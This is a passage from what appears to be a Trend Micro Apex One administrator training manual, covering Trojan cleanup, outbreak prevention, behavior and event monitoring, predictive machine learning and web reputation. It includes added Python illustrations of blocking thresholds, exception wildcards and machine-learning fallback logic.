own whitelist. Locate the application you would like to approve and add it to the Approved list.

To access the Spyware/Grayware Approved List, click Agents > Agent Management. Click
Settings > Spyware/Grayware Approved List.

A file's digital signature can be seen in its properties, particularly in the digital signature tab.


Damage Cleanup Services


Damage Cleanup Services (DCS) removes files that cannot be cleaned by the Virus Scan Engine, such
as files infected with Trojans. Damage Cleanup Services cleans computers of file-based and network
viruses, and virus and worm remnants (Trojans, Registry entries, viral files) through a fully
automated process.

Damage Cleanup Services performs the following functions:


• Detects and removes live Trojans
• Kills processes that Trojans create
• Repairs system files that Trojans modify
• Deletes files and applications that Trojans drop

Damage Cleanup Services runs automatically in the background, without the user being aware of it.
However, Apex One may sometimes notify the user to restart their endpoint to complete the process
of removing a Trojan.

Configuration settings for Damage Cleanup Services can be found in Real-Time Scan Settings >
Action > Damage Cleanup Services.


Damage Cleanup Services does not run cleanup on probable virus/malware unless Run cleanup when
probable virus/malware is detected is selected. Note that you can only select this option if the action
on probable malware is not Deny Access.

For example, if the Security Agent detects probable malware during Real-time Scan and the action is
quarantine, the Security Agent first quarantines the infected file and then runs cleanup if necessary.

Advanced Cleanup

In addition to the standard cleanup actions, the Manual Scan, Scheduled Scan and Scan Now settings
also include an advanced cleanup option. With this enabled, the Security Agent stops activities by
rogue security software (also known as FakeAV) and certain rootkit variants. The Security Agent
also uses advanced cleanup rules to proactively detect and stop applications that exhibit FakeAV
and rootkit behavior.

Damage Cleanup Services Components


Damage Cleanup Services consist of the following engine, template and driver components:
• Damage Cleanup Engine: The Damage Cleanup Engine scans for and removes Trojans and
Trojan processes. This engine supports 32-bit and 64-bit platforms.
• Damage Cleanup Template: The Damage Cleanup Template is used by the Damage Cleanup
Engine to identify Trojan files and processes so the engine can eliminate them.
• Early Boot Cleanup Driver: The Trend Micro Early Boot Cleanup Driver loads before the
operating system drivers, which enables the detection and blocking of boot-type rootkits.
After the Security Agent loads, the Early Boot Cleanup Driver calls Damage Cleanup
Services to clean the rootkit.

Assessment Mode
To help an administrator study the types of files that are flagged as spyware, Apex One provides an
option to prevent Security Agents from deleting spyware, even if they are set to clean.

Unlike other forms of malware, there is little consensus on what constitutes spyware. Cookies are a
good example of this. Like other security companies, Trend Micro can detect and remove cookies.
However, many claim that cookies are not actually spyware.

Assessment Mode gives administrators a chance to fine-tune their own policies for files addressed as
part of the anti-spyware functionality. This assessment period allows the administrator to identify
the files that they want excluded from spyware cleaning, and to add them to the Approved List. After
the assessment period, the Security Agent implements spyware cleaning functionality.

When in Assessment Mode, Agents log spyware/grayware detected during scans, but do not clean
spyware/grayware components. Cleaning terminates processes or deletes registry entries, files,
cookies, and shortcuts.


Preventing Outbreaks
To contain outbreaks, Apex One enforces outbreak prevention policies and isolates infected computers
until they are completely risk-free. Attack-specific security policies are deployed to prevent or contain
outbreaks before pattern files are available.

Outbreak Prevention Policy


Outbreak Prevention security policies can include the following:
• Limit/Deny access to shared folders
• Block Ports (only available/visible if Firewall is enabled)
• Deny write access to files and folders (excludes mapped drives)
• Deny access to executable compressed files
• Create mutual exclusion (mutex) handling on malware processes/files (only available if
Unauthorized Change Prevention service is enabled)

During outbreaks, block vulnerable ports that viruses/malware might use to gain access to Security
Agent endpoints.

Note: Configure Outbreak Prevention settings carefully. Blocking ports that are in use makes network
services that depend on them unavailable. For example, if you block the trusted port, Apex One
cannot communicate with the Agent for the duration of the outbreak.


Outbreak Notifications
Administrators can be notified when conditions warrant configuring Outbreak Prevention. Click
Administration > Notifications > Outbreak. Configure the outbreak criteria for different categories of
threats.


Starting Outbreak Prevention


When warranted, enable Outbreak Prevention to isolate infected endpoint computers. To access the
configuration settings for Outbreak Prevention, go to Agents > Outbreak Prevention, select the
appropriate domain or endpoints and click Start Outbreak Prevention.


Select the items to restrict when Outbreak Prevention is enabled by selecting them in the Policies
section of the Outbreak Prevention Settings.

In addition, a notification message can be displayed to the users when Outbreak Prevention starts.


Terminating Outbreak Prevention


When you are confident that an outbreak has been contained and that Apex One has cleaned or
quarantined all infected files, restore network settings to normal by disabling Outbreak Prevention.
Right-click the domain or endpoints using Outbreak Prevention and click Restore Settings.

A message will be displayed on the endpoint computer advising the user that outbreak policies are
no longer being enforced.



Lesson 9: Protecting Endpoint Computers Through Behavior Monitoring

Lesson Objectives:

After completing this lesson, participants will be able to:


• Protect an endpoint computer against ransomware
• Protect an endpoint computer against exploits
• Block unrecognized software
• Monitor for malware events

Behavior Monitoring
Behavior Monitoring (TMBMSVR.exe) constantly monitors endpoints for unusual modifications to the
operating system or installed software.

Behavior Monitoring in Apex One protects endpoints through the following techniques:
• Malware behavior blocking
• Ransomware protection
• Anti-exploit protection
• Fileless malware protection
• Newly encountered program protection
• Event monitoring
• Certified Safe Software Service


Malware Behavior Blocking


Malware Behavior Blocking provides a necessary layer of additional threat protection from programs
that exhibit malicious behavior. It observes system events over a period of time. As programs
execute different combinations or sequences of actions, Malware Behavior Blocking detects known
malicious behavior and blocks the associated programs. Use this feature to ensure a higher level of
protection against new, unknown, and emerging threats.

Behavior Monitoring can detect malicious scripts executed by legitimate Windows programs and the
true payload path of script files executed by legitimate DLLs to protect endpoints against malware
hidden in fileless attack vectors.

Malware Behavior Blocking provides the following threat-level scanning options:
• Known threats: Blocks behaviors associated with known malware threats
• Known and potential threats: Blocks behavior associated with known threats and takes
action on behavior that is potentially malicious


Ransomware Protection
Ransomware refers to a class of malware that holds a computer hostage until the user pays a
particular amount or abides by specific demands. Ransomware restricts access to the system when
executed and shows messages that force users into paying a ransom or performing a desired action.
Some ransomware variants encrypt files found on the system's hard drive; users are then forced to
pay up in order to decrypt the important or critical files that the ransomware altered by encrypting
them. Since these variants can hijack legitimate, normal file encryption methods to encrypt files,
they are difficult to detect.

Behavior Monitoring can detect a specific sequence of events that may indicate a Ransomware
attack. To enable ransomware protection, select the following options under Behavior Monitoring
Settings.

In addition, set the option to automatically back up and restore files changed by suspicious
applications. Apex One does not have the ability to decrypt files encrypted by malware.

The AEGIS service can receive and reply to exploit events, and terminates processes that match
violation rules.


Anti-Exploit Protection
Anti-exploit protection works in conjunction with program inspection to monitor the behavior of
programs and detect abnormal behavior that may indicate that an attacker has exploited a program
vulnerability. Once detected, Behavior Monitoring terminates the program processes.

Anti-exploit Protection requires that you select Enable program inspection to detect and block
compromised executable files.

Fileless Malware Protection (NEW)

Fileless malware is a malicious program or code that runs directly from memory. While the infection
is live, the attacker can steal sensitive information or download persistent malware. Apex One is able
to detect and block these types of attacks even though they have already started running. These
attacks use other vectors such as the Windows registry, memory, scheduled tasks and others. Violations
for these kinds of attack are hard to define because the attack may take place inside a process on the
Windows process list, and terminating a system process may cause too many false alarms that greatly
impact users.

In Apex One, fileless malware detection is used to deal with such attacks. When Anti-exploit Protection
is enabled on a Security Agent-protected endpoint, fileless protection is enabled as well. Apex One
provides protection against fileless malware with two types of scans:
• Normal Object Scan
• Dynamic Memory Scan


Normal Object Scan

Normal Object Scan is incorporated into the Anti-exploit Protection configuration. When Anti-exploit
Protection is enabled, Normal Object Scan is enabled as well.

Normal Object Scan provides protection for four different types of events that could potentially
distribute malware without requiring a file to be executed:
• Windows Management Instrumentation: Windows Management Instrumentation (WMI) is a
standard technology for accessing management information in an enterprise environment.
WMI uses the Common Information Model (CIM) industry standard to represent systems,
applications, networks, devices, and other managed components. WMI provides the ability to
obtain management data from remote computers. Malware taking advantage of weaknesses
in this technology does not reside in a separate file or in the Registry, but in a special database
in the operating system.
• Scheduled Task: The Task Scheduler in Windows enables administrators to automatically
perform routine tasks on a chosen computer.
• BitsJob: Background Intelligent Transfer Service (BITS) is used to download files from or
upload files to HTTP web servers or SMB file servers. BITS continues to transfer files after an
application exits as long as the user who initiated the transfer remains logged on and a
network connection is maintained. BITS will not force a network connection and resumes
transfers after a lost network connection is reestablished or after a user who had logged off
logs back in. Bitsadmin is a Windows built-in command-line tool that you can use to create
download or upload jobs and monitor their progress. This tool is usually skipped by antivirus
software because it is signed by Microsoft.
• RegRun: Registry keys (Run and RunOnce) cause programs to run each time that a user logs
on. This process can be compromised by adding parameters to the program startup.

Dynamic Memory Scan

Dynamic Memory Scan (MIP3) uses exploit events and suspicious memory events as the trigger
to apply memory scanning on target processes. Other trigger points for memory scans cannot
capture fileless attacks; as a result, this new memory scan is introduced in Apex One.


Dynamic Memory Scan is configured in the Real-Time Scan Settings by enabling Quarantine
malware variants detected in memory. In addition, the Unauthorized Change Prevention Service
and Advanced Protection Service must be enabled.


The Behavior Monitoring Rule setting Enable program inspection to detect and block
compromised executable files must also be enabled for this type of fileless scan.

Newly Encountered Program Protection


Behavior Monitoring works in conjunction with Web Reputation Services and Real-time Scan to verify
the prevalence of files downloaded through web channels, email applications, or Microsoft Office
macro scripts. After detecting a newly encountered file, administrators can choose to prompt users
before executing the file. Trend Micro classifies a program as newly encountered based on the
number of file detections or historical age of the file as determined by the Smart Protection
Network.

Census describes the rating of files based on their prevalence and maturity. Prevalence refers to how
common a file is, while maturity refers to the period of time between the first time a file was
recorded in the Census server and the time of the query.

Apex One provides protection for Zero-Day Attacks through the Behavior Monitoring Engine, Web
Reputation, and File Census to provide a score that VSAPI can use to take action on a possible
malicious file.


Behavior Monitoring scans the following file types for each channel:
• HTTP and HTTPS: Scans .exe files
• Email applications: Scans .exe and compressed .exe files in unencrypted .zip and .rar files

The decision to block suspect applications relies on the census value as in the following table:

File Type      Blocking Threshold

HTTP/HTTPS     Prevalence < 20 and Maturity < 3 months

E-MAIL         Prevalence < 20
               OR
               Prevalence < 100 and Maturity < 3 months

In the Behavior Monitoring Settings window, enable Monitor newly encountered programs
downloaded through HTTP or email applications. After blocking an application, administrators can
choose to prompt users before executing the file or merely log the event.
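The following Python function is an added illustration of how the census thresholds in the table above combine with the prompt-or-log choice (it is not Apex One's own logic). Maturity is computed as the time between the file's first record in the Census server and the query, as defined earlier. The channel names, the census record layout, the constructed sample records, and expressing "3 months" as 90 days are assumptions.

```python
"""Blocking decision for newly encountered programs per the threshold table.
Added illustration, not Apex One's logic; channel names, the census record
layout and expressing '3 months' as 90 days are assumptions."""
from datetime import datetime, timedelta

MATURITY_LIMIT = timedelta(days=90)   # '3 months', assumed as 90 days


def maturity(first_seen, query_time):
    """Maturity = time between the file's first Census record and the query."""
    if query_time < first_seen:
        raise ValueError("query time precedes first-seen time")
    return query_time - first_seen


def should_block(channel, prevalence, first_seen, query_time):
    """Apply the per-channel threshold; comparisons are strict, as in the table."""
    immature = maturity(first_seen, query_time) < MATURITY_LIMIT
    if channel == "http":        # HTTP and HTTPS downloads
        return prevalence < 20 and immature
    if channel == "email":       # .exe attachments, incl. inside unencrypted .zip/.rar
        return prevalence < 20 or (prevalence < 100 and immature)
    raise ValueError(f"unknown channel: {channel!r}")


def decide(record, query_time, prompt_user=False):
    """Map a census record to the handling the administrator configured:
    'prompt' (ask the user before execution) or 'log' when blocked, else 'allow'."""
    blocked = should_block(record["channel"], record["prevalence"],
                           record["first_seen"], query_time)
    if not blocked:
        return "allow"
    return "prompt" if prompt_user else "log"


def triage(records, query_time, prompt_user=False):
    """Decision per file name for a batch of census records."""
    return {r["name"]: decide(r, query_time, prompt_user) for r in records}


# Constructed census records for a few downloads (not real data).
SAMPLE_RECORDS = [
    {"name": "installer.exe", "channel": "http", "prevalence": 3,
     "first_seen": datetime(2019, 7, 20)},          # rare and only days old
    {"name": "setup-tool.exe", "channel": "http", "prevalence": 50000,
     "first_seen": datetime(2015, 1, 1)},           # common and years old
    {"name": "invoice.exe", "channel": "email", "prevalence": 60,
     "first_seen": datetime(2019, 7, 25)},          # under 100 and immature
]

if __name__ == "__main__":
    print(triage(SAMPLE_RECORDS, datetime(2019, 7, 29)))
```

Note the strictness of the comparisons: a file seen exactly 20 times on the HTTP channel is not blocked, and on the email channel a prevalence below 20 is blocked regardless of how old the file is.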

Note: If using Microsoft System Center Configuration Manager to distribute software, do not enable
the Prompt User setting as the end user will not see the prompt and the software may not install
properly.


Event Monitoring
Event Monitoring provides a more generic approach to protecting against unauthorized software
and malware attacks. It monitors system areas for certain events, allowing administrators to
regulate programs that trigger such events. Use Event Monitoring if you have specific system
protection requirements that are above and beyond what is provided by Malware Behavior Blocking.

In the Behavior Monitoring Settings window, click Enable Event Monitoring. Expand Specify detail
settings and select the appropriate items to monitor.

• Duplicated System File: Many malicious programs create copies of themselves or other
malicious programs using file names used by Windows system files. This is typically done to
override or replace system files, avoid detection, or discourage users from deleting the
malicious files.
• Hosts File Modification: The Hosts file matches domain names with IP addresses. Many
malicious programs modify the Hosts file so that the web browser is redirected to infected,
non-existent, or fake websites.
• Suspicious Behavior: Suspicious behavior can be a specific action or a series of actions that
is rarely carried out by legitimate programs. Programs exhibiting suspicious behavior should
be used with caution.
• New Internet Explorer Plug-in: Spyware/grayware programs often install unwanted Internet
Explorer plug-ins, including toolbars and Browser Helper Objects.


• Internet Explorer Setting Modification: Many viruses/malware change Internet Explorer
settings, including the home page, trusted websites, proxy server settings, and menu
extensions.
• Security Policy Modification: Modifications in Windows Security Policy can allow unwanted
applications to run and change system settings.
• Program Library Injection: Many malicious programs configure Windows so that all
applications automatically load a program library (DLL). This allows the malicious routines in
the DLL to run every time an application starts.
• Shell Modification: Many malicious programs modify Windows shell settings to associate
themselves to certain file types. This routine allows malicious programs to launch
automatically if users open the associated files in Windows Explorer. Changes to Windows
shell settings can also allow malicious programs to track the programs used and start
alongside legitimate applications.
• New Service: Windows services are processes that have special functions and typically run
continuously in the background with full administrative access. Malicious programs
sometimes install themselves as services to stay hidden.
• System File Modification: Certain Windows system files determine system behavior,
including startup programs and screen saver settings. Many malicious programs modify
system files to launch automatically at startup and control system behavior.
• Firewall Policy Modification: The Windows Firewall policy determines the applications that
have access to the network, the ports that are open for communication, and the IP addresses
that can communicate with the computer. Many malicious programs modify the policy to
allow themselves access to the network and the Internet.
• System Process Modification: Many malicious programs perform various actions on built-in
Windows processes. These actions can include terminating or modifying running processes.
• New Startup Program: Malicious applications usually add or modify autostart entries in the
Windows registry to automatically launch every time the computer starts.

Event Monitoring Actions

When Event Monitoring detects a monitored system event, it performs the action configured for
the event.
• Assess: The Security Agent always allows programs associated with an event to run and
logs the event for assessment. This is the default action for all monitored system events.
• Allow: The Security Agent always allows programs associated with an event to run.
• Ask when necessary: The Security Agent prompts users to allow or deny programs
associated with an event from running and adds the programs to the exception list. If the
user does not respond within a certain time period, the Security Agent automatically
allows the program to run. The default time period is 30 seconds.
• Deny: The Security Agent always blocks programs associated with an event from
running and logs the event. After blocking a program with notifications enabled, the
Security Agent displays a notification on the endpoint.


Note: Since Event Monitoring creates a lot of logs, by default Behavior Monitoring violations are
collected for a period of 1 hour and then uploaded to the server. In environments with many Agents,
if all logs were sent separately like normal detections, the server would be flooded.
On the Agent this value appears in the Windows Registry under:
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\TrendMicro\PC-cillinNTCorp\CurrentVersion\AEGIS\SendBMLogPeriod

Behavior Monitoring Exception List


The Behavior Monitoring exception list contains programs that Security Agents do not monitor using
Behavior Monitoring.
• Approved Programs: The Security Agent allows all programs in the Approved Programs list to
bypass Behavior Monitoring scanning.

Note: Although Behavior Monitoring does not take action on programs added to the Approved
Programs list, other scan features (such as file-based scanning) continue to scan the program
before allowing the program to run.

• Blocked Programs: The Security Agent blocks all programs in the Blocked Programs list.


The Behavior Monitoring Approved/Blocked List supports the use of wildcard characters when
defining file path, file name, and file extension exception types. Use the following tables to properly
format your exception lists to ensure that Apex One excludes the correct files and folders from
scanning.

Supported wildcard characters:


• Asterisk (*): Represents any character or string of characters.
• Question mark (?): Represents a single character.
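To see what an exception entry actually covers before adding it to the Approved or Blocked list, the following Python matcher applies the two wildcard rules above (asterisk for any string of characters, question mark for exactly one). It is an added illustration, not Apex One's own matcher; that comparison is case-insensitive and that an asterisk may span backslashes in a path are assumptions, as is the "overly broad" review heuristic at the end.

```python
"""Wildcard matching for Behavior Monitoring Approved/Blocked List entries:
'*' is any string of characters (possibly empty) and '?' is exactly one
character. Added illustration, not Apex One's own matcher. Assumptions:
comparison is case-insensitive (Windows paths) and '*' may span '\\'."""
import re


def entry_to_regex(entry):
    """Translate one exception-list entry into an anchored regular expression."""
    pieces = []
    for ch in entry:
        if ch == "*":
            pieces.append(".*")            # any run of characters, including none
        elif ch == "?":
            pieces.append(".")             # exactly one character
        else:
            pieces.append(re.escape(ch))   # '\\', '.', '(' and friends stay literal
    return re.compile("^" + "".join(pieces) + "$", re.IGNORECASE | re.DOTALL)


def matches(entry, path):
    """True if the whole path is covered by the entry (no partial matches)."""
    return entry_to_regex(entry).match(path) is not None


def covering_entries(entries, path):
    """Which entries of a list would exempt (or block) this path."""
    return [e for e in entries if matches(e, path)]


def is_overly_broad(entry):
    """Added review heuristic: an entry that starts with a wildcard, or whose
    literal part carries no directory (e.g. '*\\update.exe' or '*.exe'),
    applies to that name anywhere on disk."""
    literal = entry.replace("*", "").replace("?", "")
    return entry[:1] in ("*", "?") or "\\" not in literal


if __name__ == "__main__":
    # Constructed entries and path for illustration.
    sample_list = [r"C:\Program Files\Vendor\*.exe", r"*\update.exe", r"C:\Tools\*"]
    print(covering_entries(sample_list, r"C:\Tools\update.exe"))
    print([e for e in sample_list if is_overly_broad(e)])
```

A file-name-only entry such as `report_????.pdf` is flagged as broad because it matches that name in any directory; whether that is intended is exactly the question to answer before adding it.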



Lesson 10: Protecting Endpoint Computers From Unknown Threats

Lesson Objectives:

After completing this lesson, participants will be able to:


• Enable Predictive Machine Learning

The Advanced Threat Scan Engine (ATSE) enhances protection against zero day attacks. ATSE is an
enhanced version of VSAPI that uses VSAPI output as a basis for heuristic detection (characteristic
analysis).

Common Vulnerabilities and Exposures Exploits


If a file’s characteristics match a Common Vulnerabilities and Exposures (CVE) Exploit rule, it will be
detected by the ATSE scan engine through Real-time Scans.


Advanced Threat Scanning supports the following two application types.


• Email: Advanced Threat Scanning supports Outlook and Windows Live Mail. When a user opens
an email with an attached sample, the attachment will be scanned by ATSE. The Agent will
display a notification if the attachment contains a possible malware payload.
• Web Browser: When a user accesses a web site through their web browser using HTTP or HTTPS,
files dropped onto the user’s computer will be scanned by ATSE. If any malicious sample is
dropped onto the user’s machine, an alert is displayed notifying the user of a possible
virus. Supported web browsers include: Internet Explorer, Chrome, Firefox, Microsoft Edge,
Opera, Safari and Sleipnir.

Supported File Types


The following file types are monitored by Advanced Threat Scanning:

Application            Extension
Microsoft Word         doc, docx, docm, dot, dotx, dotm
Microsoft Excel        xls, xlsx, xlsm, xlsb, xlt, xltx, xltm, xla, xlam
Microsoft PowerPoint   ppt, pptx, pptm, pot, potx, potm, pps, ppsx, ppsm, ppa, ppam
Microsoft Outlook      msg
Microsoft Office       xps, mht, mhtml
Other                  pdf, rtf, swf, xlr, wps, wpd, odt

Predictive Machine Learning


Apex One incorporates Predictive Machine Learning technology to provide better protection for threats
such as ransomware or advanced persistent threats.

Predictive Machine Learning operates on the concept that a computer can learn information without
human mediation. It uses algorithms to examine large volumes of information or training data to
discover unique patterns. This system analyzes these patterns, groups them accordingly, and makes
predictions. Through repetition, it learns by inference without a need to be deliberately programmed
each and every time.

Predictive Machine Learning can evaluate unknown threats found in suspicious processes or files
originating from USB, web, or email channels. It does this by using good and bad sample files to extract
the file features that are used to train the Machine Learning Model. This model takes advantage of
Trend Micro’s Smart Protection Network and Threat Research to educate the model with the file
features that enable the technology to have a high detection rate.

Once Apex One detects an unknown file or process, it extracts the file/process features, submits them
to the model, and uses the technology to predict whether the file is good or bad.


The Predictive Machine Learning design utilizes Portable Executable (PE) file features, such as Opcode,
Import table or others like Entropy and Icon to train the Machine Learning Model.

[Figure: Security Agent and the Machine Learning Model]

Take the example of a known ransomware and an unknown variant. The two variations have different
sizes and different SHA1 values. However, the unknown variant of ransomware can still be recognized
through Predictive Machine Learning by using file features such as Opcode and Import table data
information.
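The following Python code is an added illustration of what one of the static features named above looks like in practice, using entropy (it is not Trend Micro's feature extractor). It builds two constructed samples that differ in size and SHA1, as in the variant example just described, and shows that the entropy-based features are unchanged; the sample buffers and the 7.0 bits-per-byte "packed" threshold are assumptions.

```python
"""Shannon entropy as a static file feature, one of the PE features the text
lists alongside opcodes, import tables and icons. Added illustration, not
Trend Micro's feature extractor; sample buffers are constructed and the
7.0 bits/byte 'packed' threshold is an assumed heuristic."""
import hashlib
import math
from collections import Counter


def shannon_entropy(data):
    """Bits per byte: 0.0 for one repeated value, 8.0 when all 256 values are equally frequent."""
    if not data:
        return 0.0
    n = len(data)
    ent = -sum(c / n * math.log2(c / n) for c in Counter(data).values())
    return ent + 0.0        # normalise -0.0 from the single-value case


def windowed_entropy(data, window=256):
    """Entropy of each fixed-size window; a packed or encrypted payload shows as a run of high values."""
    return [shannon_entropy(data[i:i + window]) for i in range(0, len(data), window)]


def feature_vector(data, window=256, threshold=7.0):
    """Features a model could consume: overall entropy, peak window entropy and
    how many windows look packed (threshold is an assumed heuristic)."""
    windows = windowed_entropy(data, window)
    return {
        "entropy": round(shannon_entropy(data), 4),
        "max_window_entropy": max(windows),
        "high_entropy_windows": sum(1 for h in windows if h >= threshold),
    }


def sha1(data):
    return hashlib.sha1(data).hexdigest()


# Constructed samples: a 256-byte 'payload' using every byte value once (maximal
# entropy) surrounded by zero padding. The 'variant' differs only in padding
# length, so its size and SHA1 change while the payload-level features do not.
PAYLOAD = bytes((i * 167) % 256 for i in range(256))    # permutation of 0..255
KNOWN_SAMPLE = b"\x00" * 512 + PAYLOAD + b"\x00" * 512
VARIANT_SAMPLE = b"\x00" * 768 + PAYLOAD + b"\x00" * 512

if __name__ == "__main__":
    for name, blob in (("known", KNOWN_SAMPLE), ("variant", VARIANT_SAMPLE)):
        print(name, len(blob), sha1(blob)[:12], feature_vector(blob))
```

Whole-file entropy shifts with the amount of padding, which is why per-window features (peak entropy, number of high-entropy windows) are the ones that survive trivial re-padding of the same payload.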

Predictive Machine Learning accuracy is largely based on the training from existing verified good and
bad files in which the Trend Micro Smart Protection Network is a key component.

Machine Learning can extract many characteristics from a static file before runtime and can also observe
the file during runtime. Pre-execution analysis can block malware before it is executed; however, it can
be evaded by the various obfuscation techniques commonly used by today's malware. Post-runtime
analysis examines the true intention (behavior) of the malware, which is more difficult for malware to
evade. However, in this case some damage may already have occurred, since the malware has already
executed.

While Apex One Predictive Machine Learning continues to advance its learning, only a small fraction of
malware is missed by signatures and behavioral techniques, and 99.7% of these were caught with
machine learning in the test cases so far. By combining Machine Learning with the other Apex One
protection techniques you create a layered approach that can lower false positives even further and
improve performance (for example, because only a smaller set of files needs to be examined with the
deeper machine learning analysis).

Once Machine Learning determines a file to be malicious, the verdict is sent to the Smart Protection
Network so that on the next occurrence the file is caught by the higher-performance file reputation
technology for that customer, and so that it is also caught for other customers and across the other
Trend Micro products that use file reputation technology.

File Detections
After detecting an unknown or low-prevalence file, Apex One scans the file using the Advanced
Threat Scan Engine (ATSE) to extract file features and sends the report to the PML engine, hosted
on the Trend Micro Smart Protection Network. Through the use of malware modeling, PML compares
the sample to the malware model, assigns a probability score, and determines the probable malware
type that the file contains. Depending on the PML configuration settings, Apex One can attempt to
quarantine the affected file to prevent the threat from continuing to spread across your network.

Process Detections
After detecting an unknown or low-prevalence process, Apex One monitors the process using the
Contextual Intelligence Engine, and sends the behavioral report to the Predictive Machine Learning
engine. Through the use of behavioral malware modeling, Predictive Machine Learning compares the
process behavior to the model, assigns a probability score, and determines the probable malware
type the process is executing. Depending on the Predictive Machine Learning configuration settings,
Apex One can terminate the affected process and attempt to clean the file that executed the
process.

Enabling Predictive Machine Learning


Security Agents examine files from different channels:
• USB
• Web (no plug-in required, but only Internet Explorer, Chrome, Firefox, Edge)
• Email (Outlook only)

Combining Predictive Machine Learning with other protection techniques can lower false positives
and obtain higher performance.

In the Apex One Web Management console, click Agents > Agent Management and right-mouse click
specific domains or Agents. Click Settings > Predictive Machine Learning Settings. Click to Enable
Predictive Machine Learning and select File and/or Process detection along with the Action.

Predictive Machine Learning supports the following actions on detection:

• For File: Log only, Quarantine (default)
• For Process: Log only, Terminate (default). After terminating the process, Apex One
attempts to clean or quarantine the file and threat remnants from the endpoint.

Note: Predictive Machine Learning uses ATSE, and therefore supports the same browsers and mail
applications. Both HTTP and HTTPS are supported and no plug-in is needed. When a file is
downloaded, the VSAPI callback checks whether the parent process is a browser. If it is, the file is
identified as a browser download.

Exceptions
Configure the Predictive Machine Learning file exceptions to prevent agents from detecting a file as
malicious.

In the Exception section of the Predictive Machine Learning Settings, click Add File Hash. Specify the
SHA-1 hash value of the file to exclude from scanning.

Connection Settings
Security Agents need to be able to connect to the following URLs:
• https://osce140-en-b.trx.trendmicro.com
• https://osce140-en-f.trx.trendmicro.com

You can also configure your environment so that Machine Learning requests are performed through
the Smart Protection Server if the endpoints don’t have Internet access to submit file characteristics
themselves.

To configure this scenario from the Apex One Server console, go to Agents > Global Agent Settings >
System. In the Smart Protection Service Proxy section, click Use configured Smart Protection
Sources for service queries.

It is also necessary to enable the File Reputation Service HTTPS query when using the Smart Protection
Service Relay. The Predictive Machine Learning query uses the current File Reputation Service server
name and port to forward the request to the back-end Machine Learning Service.

In the Apex One Web Management console, go to Administration > Smart Protection > Integrated
Server and enable Use HTTPS for scan queries.

Offline Predictive Machine Learning NEW

Predictive Machine Learning requires a connection to the Smart Protection Network to submit file
features to the learning model for analysis. If no connection to the Internet is available on the Agent
endpoint, a local Smart Protection Server can be configured to proxy the Internet-based submission to
the machine learning model.

In Apex One, a new local machine learning model is introduced to protect the Agent when there is no
network connection. When an Agent query to the Internet-based machine learning model is unsuccessful
in three attempts, it will switch to local scan mode. This local mode supports file-based pre-execution
machine learning scans.

A query to the cloud-based Smart Protection model will be attempted again if any of the following three
conditions is met:
• A change to the IP address or Agent computer NIC is detected
• There is a change to the Predictive Machine Learning Settings, Smart Protection Service Proxy
Settings or Smart Protection Server Port Settings
• Five minutes have elapsed since the last cloud query

If the cloud query is successful, the Security Agent will terminate local mode.
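The following Python simulation of the cloud-to-local fallback just described is an added illustration, not Trend Micro code: the class and method names are assumptions, the caller supplies the clock, and treating process detections as unavailable in local mode is an inference from the statement that local mode supports file-based pre-execution scans only.

```python
"""Simulation of the Security Agent's fallback from the cloud-based Predictive
Machine Learning model to the local file model. Added illustration, not Trend
Micro code: names are assumptions and `now` is a float of seconds from the caller."""

from dataclasses import dataclass

CLOUD_ATTEMPTS = 3              # unsuccessful cloud attempts before local scan mode
CLOUD_RETRY_INTERVAL_SEC = 300  # retry the cloud after five minutes in local mode


@dataclass
class PmlAgentState:
    in_local_mode: bool = False
    last_cloud_attempt: float = float("-inf")
    ip_address: str = ""        # last seen endpoint IP (a NIC change is modelled the same way)
    settings_version: int = 0   # bumped on any PML, proxy or SPS port settings change

    def cloud_retry_due(self, now, ip_address, settings_version):
        """Outside local mode the cloud is always queried; in local mode a cloud
        query is re-attempted only on one of the three listed conditions."""
        if not self.in_local_mode:
            return True
        return (ip_address != self.ip_address
                or settings_version != self.settings_version
                or now - self.last_cloud_attempt >= CLOUD_RETRY_INTERVAL_SEC)

    def scan(self, now, kind, cloud_query, ip_address, settings_version):
        """Scan one object of `kind` ('file' or 'process') and report which model
        produced the verdict. `cloud_query` is a callable that returns True when
        the Smart Protection Network answered."""
        if self.cloud_retry_due(now, ip_address, settings_version):
            self.last_cloud_attempt = now
            for _ in range(CLOUD_ATTEMPTS):
                if cloud_query():
                    self.in_local_mode = False   # a successful query ends local mode
                    break
            else:
                self.in_local_mode = True        # three failures: switch to local mode
        self.ip_address, self.settings_version = ip_address, settings_version
        if not self.in_local_mode:
            return "cloud"
        # Local mode supports file-based pre-execution scans; treating process
        # detections as unavailable offline is an assumption of this model.
        return "local" if kind == "file" else "unavailable"
```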

Predictive Machine Learning Local File Model


The Predictive Machine Learning Local File Model is the new pattern file and whitelist used for local
mode Predictive Machine Learning. The whitelist portion of this pattern is updated weekly, while the
local model is updated monthly. Pattern updates are incremental, and the size of the pattern file is
around 2 MB.

Lesson 11: Blocking Web Threats

Lesson Objectives:

After completing this lesson, participants will be able to:


• Configure Web Reputation to block potentially malicious Web sites
• Configure clients to bypass Web Reputation for selected Web sites
• Configure Suspicious Connection Service
• Configure Browser Exploit Prevention

Web threats encompass a broad array of threats that originate from the Internet. Web threats are
sophisticated in their methods, using a combination of various files and techniques rather than a single
file or approach.

One goal of these threats is to steal information for subsequent sale. The resulting impact is the leakage
of confidential information in the form of identity loss. The infected endpoint may also become a vector
to deliver phishing attacks or other information-capturing activities. Among other impacts, this threat
has the potential to erode confidence in web commerce, corrupting the trust needed for Internet
transactions.

An additional goal of these threats is to hijack a user’s CPU power to use it as an instrument to conduct
profitable activities. Activities include sending spam, conducting extortion in the form of distributed
denial-of-service attacks, pay-per-click activities or cryptocurrency mining.

Apex One can protect endpoint computers against Web threats through the following capabilities:
• Blocking access to malicious URLs through Web Reputation
• Detecting suspicious connections
• Protecting against browser exploits

Web Reputation
Web reputation technology tracks the credibility of web domains by assigning a reputation score based
on factors such as a website's age, historical location changes, and indications of suspicious activities
discovered through malware behavior analysis. Trend Micro continually analyzes websites and updates
web reputation scores to prevent users from accessing potentially malicious content.

When a user attempts to access a website, the Security Agent queries a Smart Protection source to
ascertain the risk level of the content. The configured Web Reputation policy for the Security Agent
determines whether to allow access to the website.

The databases used include references to sites collected from a variety of sources, including URLs
collected from malware analysis. Billions of URLs are processed per day by Trend Micro Web Reputation
Services.

Sites in the database are classified and assigned credibility scores that reflect their potential for
infecting computers or their involvement in a malware or spyware lifecycle (for example, as sources
of instructions or components). The database contains over 11 million URLs classified as dangerous.

Trend Micro products with Web Reputation protection enabled use these credibility scores to regulate
access to these sites. The Web site reputation score is correlated with the specific Web Reputation
Security Level enforced on the computer. Depending on the Web Reputation Security Level being
